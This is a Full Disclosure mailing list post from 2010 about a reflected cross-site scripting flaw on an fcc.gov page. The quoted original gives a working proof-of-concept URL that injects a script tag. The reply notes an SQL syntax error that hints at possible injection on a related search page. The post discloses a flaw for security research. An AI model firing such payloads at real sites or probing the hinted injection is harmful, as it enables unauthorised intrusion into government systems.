Full Disclosure mailing list archives
Re: fcc.gov XSS
From: "Zach C." <fxchip () gmail com>
Date: Mon, 24 May 2010 01:29:36 -0700
There seem to be a few more problems with that script than just that XSS... For example, going to the Application Search page root (the page that takes you to that one, presumably) and selecting literally everything in the Services listbox will net you an error reporting "Incorrect syntax near ','" for server 'HEIMDAL'. It apparently occurs on line 4. I dunno. I'm not gonna mess around with it too much though :)

On Mon, May 24, 2010 at 12:58 AM, Marshall Whittaker <marshallwhittaker () gmail com> wrote:

FCC.gov XSS

--- CODE ---
http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791&File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert('h4x0r3d');%3C/script%3E<http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791&File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert%28%27h4x0r3d%27%29;%3C/script%3E>
--- CODE ---

--oxagast

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/